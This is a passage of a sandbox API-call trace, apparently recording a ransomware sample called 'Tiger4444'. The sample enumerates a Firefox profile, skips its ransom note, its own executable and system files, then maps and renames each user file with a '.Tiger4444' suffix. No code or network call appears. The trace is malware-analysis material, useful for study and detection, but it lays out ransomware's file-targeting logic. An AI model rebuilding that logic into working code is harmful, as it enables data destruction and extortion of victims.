(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.310] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.310] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14176280983) returned 1 [0050.310] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=65536) returned 1 [0050.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0050.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0050.310] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x2c8 [0050.312] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0xbe0000 [0050.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.322] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14177536763) returned 1 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0050.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0050.322] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.323] CloseHandle (hObject=0x2c8) returned 1 [0050.323] CloseHandle (hObject=0x260) returned 1 [0050.323] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db.Tiger4444") returned 92 [0050.323] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cert8.db.tiger4444"), dwFlags=0x1) returned 1 [0050.324] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x400ce751, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xc7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="Tiger4444.exe") returned -1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2=".") returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="..") returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="windows") returned -1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="bootmgr") returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="pagefile.sys") returned -1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="boot") returned 1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="ids.txt") returned -1 [0050.324] lstrcmpiW (lpString1="compatibility.ini", lpString2="NTUSER.DAT") returned -1 [0050.324] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="compatibility.ini" | out: lpString1="compatibility.ini") returned="compatibility.ini" [0050.324] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\compatibility.ini", dwFileAttributes=0x0) returned 1 [0050.324] lstrlenW (lpString="compatibility.ini") returned 17 [0050.324] lstrlenW (lpString="Tiger4444") returned 9 [0050.324] lstrcmpiW (lpString1="ility.ini", lpString2="Tiger4444") returned -1 [0050.324] lstrlenW (lpString=".dll") returned 4 [0050.324] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.325] lstrlenW (lpString=".lnk") returned 4 [0050.325] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.325] lstrlenW (lpString=".ini") returned 4 [0050.325] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.325] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff9a54e3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xff9a54e3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xff9a54e3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x329, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="containers.json", cAlternateFileName="CONTAI~1.JSO")) returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="Tiger4444.exe") returned -1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2=".") returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="..") returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="windows") returned -1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="bootmgr") returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="pagefile.sys") returned -1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="boot") returned 1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="ids.txt") returned -1 [0050.325] lstrcmpiW (lpString1="containers.json", lpString2="NTUSER.DAT") returned -1 [0050.325] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="containers.json" | out: lpString1="containers.json") returned="containers.json" [0050.325] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json", dwFileAttributes=0x0) returned 1 [0050.325] lstrlenW (lpString="containers.json") returned 15 [0050.325] lstrlenW (lpString="Tiger4444") returned 9 [0050.325] lstrcmpiW (lpString1="ners.json", lpString2="Tiger4444") returned -1 [0050.325] lstrlenW (lpString=".dll") returned 4 [0050.325] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.325] lstrlenW (lpString=".lnk") returned 4 [0050.325] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.325] lstrlenW (lpString=".ini") returned 4 [0050.325] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.325] lstrlenW (lpString=".sys") returned 4 [0050.325] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.326] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.326] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.326] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14177885766) returned 1 [0050.326] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=809) returned 1 [0050.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.326] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0050.326] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x2c8 [0050.327] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0xbe0000 [0050.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.335] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.335] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14178828047) returned 1 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.335] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0050.335] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.335] CloseHandle (hObject=0x2c8) returned 1 [0050.335] CloseHandle (hObject=0x260) returned 1 [0050.335] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json.Tiger4444") returned 99 [0050.335] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json.tiger4444"), dwFlags=0x1) returned 1 [0050.336] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff97f27a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xff97f27a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x439749, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Tiger4444.exe") returned -1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2=".") returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="..") returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="windows") returned -1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="bootmgr") returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="pagefile.sys") returned -1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="boot") returned 1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ids.txt") returned -1 [0050.336] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.336] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="content-prefs.sqlite" | out: lpString1="content-prefs.sqlite") returned="content-prefs.sqlite" [0050.336] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite", dwFileAttributes=0x0) returned 1 [0050.337] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0050.337] lstrlenW (lpString="Tiger4444") returned 9 [0050.337] lstrcmpiW (lpString1="fs.sqlite", lpString2="Tiger4444") returned -1 [0050.337] lstrlenW (lpString=".dll") returned 4 [0050.337] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.337] lstrlenW (lpString=".lnk") returned 4 [0050.337] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.337] lstrlenW (lpString=".ini") returned 4 [0050.337] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.337] lstrlenW (lpString=".sys") returned 4 [0050.337] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.337] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.337] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14179046000) returned 1 [0050.337] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=229376) returned 1 [0050.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.337] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0050.338] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x38300, lpName=0x0) returned 0x2c8 [0050.338] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x38300) returned 0xbe0000 [0050.345] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.345] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.345] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.346] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.346] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.346] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.346] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.346] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14179897106) returned 1 [0050.346] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0050.346] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0050.346] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.348] CloseHandle (hObject=0x2c8) returned 1 [0050.348] CloseHandle (hObject=0x260) returned 1 [0050.348] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite.Tiger4444") returned 104 [0050.348] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0050.348] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ef1bce, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x1ef1bce, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0050.348] lstrcmpiW (lpString1="cookies.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Tiger4444.exe") returned -1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2=".") returned 1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="..") returned 1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="windows") returned -1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="bootmgr") returned 1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="pagefile.sys") returned -1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="boot") returned 1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ids.txt") returned -1 [0050.349] lstrcmpiW (lpString1="cookies.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.349] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="cookies.sqlite" | out: lpString1="cookies.sqlite") returned="cookies.sqlite" [0050.349] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite", dwFileAttributes=0x0) returned 1 [0050.349] lstrlenW (lpString="cookies.sqlite") returned 14 [0050.349] lstrlenW (lpString="Tiger4444") returned 9 [0050.349] lstrcmpiW (lpString1="es.sqlite", lpString2="Tiger4444") returned -1 [0050.350] lstrlenW (lpString=".dll") returned 4 [0050.350] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.350] lstrlenW (lpString=".lnk") returned 4 [0050.350] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.350] lstrlenW (lpString=".ini") returned 4 [0050.350] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.350] lstrlenW (lpString=".sys") returned 4 [0050.350] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.350] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.350] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14180316414) returned 1 [0050.350] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=524288) returned 1 [0050.350] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0050.350] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0050.350] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x2c8 [0050.351] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2eb0000 [0050.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.370] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.370] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.371] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14182368383) returned 1 [0050.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0050.371] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0050.371] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0050.375] CloseHandle (hObject=0x2c8) returned 1 [0050.375] CloseHandle (hObject=0x260) returned 1 [0050.375] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite.Tiger4444") returned 98 [0050.375] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0050.376] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashes", cAlternateFileName="")) returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="Tiger4444.exe") returned -1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2=".") returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="..") returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="windows") returned -1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="bootmgr") returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="pagefile.sys") returned -1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="boot") returned 1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="ids.txt") returned -1 [0050.376] lstrcmpiW (lpString1="crashes", lpString2="NTUSER.DAT") returned -1 [0050.376] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="crashes" | out: lpString1="crashes") returned="crashes" [0050.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0050.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa4) returned 0xc88aa8 [0050.376] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc663a8 [0050.376] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2d6a08c7, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb844f993, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="datareporting", cAlternateFileName="DATARE~1")) returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="Tiger4444.exe") returned -1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2=".") returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="..") returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="windows") returned -1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="bootmgr") returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="pagefile.sys") returned -1 [0050.376] lstrcmpiW (lpString1="datareporting", 